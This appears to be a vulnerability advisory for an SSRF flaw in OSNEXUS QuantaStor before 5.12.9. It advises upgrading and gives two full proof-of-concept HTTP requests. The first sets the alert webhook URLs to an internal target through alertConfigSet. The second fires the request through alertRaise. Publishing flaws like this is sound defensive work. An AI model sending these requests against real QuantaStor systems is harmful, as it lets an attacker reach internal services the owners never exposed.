Advisory

Upgrade to the latest version of OSNexus Quantastor;

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9. An authenticated admin can prepare a alert. When triggering this alert, it can execute an SSRF attack (only with POST requests).

Prepping the SSRF

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=localhost&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://localhost&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://localhost HTTP/1.1
Host: 192.168.1.154
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic ddddddd
Content-Type: application/json
Content-Length: 0

Executing SSRF:

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: 192.168.1.154
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic dddddd
Content-Type: application/json
Content-Length: 1